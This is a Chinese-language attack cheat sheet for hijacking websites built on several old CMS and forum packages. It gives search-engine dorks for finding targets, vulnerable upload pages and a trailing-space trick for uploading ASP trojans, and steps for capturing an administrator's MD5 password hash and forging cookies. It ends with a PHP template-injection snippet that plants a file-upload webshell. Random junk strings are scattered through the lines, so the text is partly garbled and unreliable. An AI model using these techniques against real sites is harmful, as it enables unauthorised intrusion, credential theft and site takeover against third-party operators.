一、E时代驿站漏洞
@)6b 百度搜索"E时代驿站"
]O"f % 漏洞利用页面 /upload.asp 用老兵直接上传
r6Yd"~ n ly17FLJ]. 二、沸腾新闻系统上传漏洞
k8+J7(_c 搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用
FT-.gi0 漏洞:没有对空格进行严格的限制。
)bOfs*S 所以,我们直接选定要上传的asp木马,然后在后面加上空格
z/1$G" 它的上传文件是UploadFaceOK.asp
5lG\Z? at_*Zh( 三、尘缘雅境
'Z4}O_5_ ]u|v7}I4 在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看
n9+33^ PT 到出现了 一大堆 使用尘缘雅境系统的网站.比如说他的网站首页是
http://www.xx.com/asfq/index.asp,那么就要这样填写
http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目录]:/asfq/admin(注意一定要加上admin),[漏洞文件]一般不用改,不过有些老版的尘缘系统的漏洞文是uploadok.asp,如果uploadfaceok.asp不成功再改
s Z[[ymu8 z}!g2d 四、OFSTAR论坛漏洞利用程序(群共享中)
pD%(Y^h? 搜索: powered by ofstar.net
B-rE8\ 1:输入管理员用户名
b?i+nhqI 2:输入任意一个帖子的路径!
CvY+b^ ; 3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的!
hTX[W%K 4:单击直接登陆按钮!程序会自动构造Cookies进行锹?单击管理栏的"超管"可直接进入后台!
Bdt6 w(`^ ls^Z"9P 上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样)
<#C,66k ][$I~nRf 然后使用提交页面提交``可以直接拿到shell!
3}fOb +twoUn{# <style type='text/css'>
?IVJ#6[ </style>
U"k$qZ[ <!--
(4+P7Z,Nc EOT;
E{|B&6$[} ?>-->
H`CID*Ji <?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
lI=<lmM0|/ <!--
(SBhU:^h <?php
oZvG Kf print <<<EOT
4`5yrCd -->
&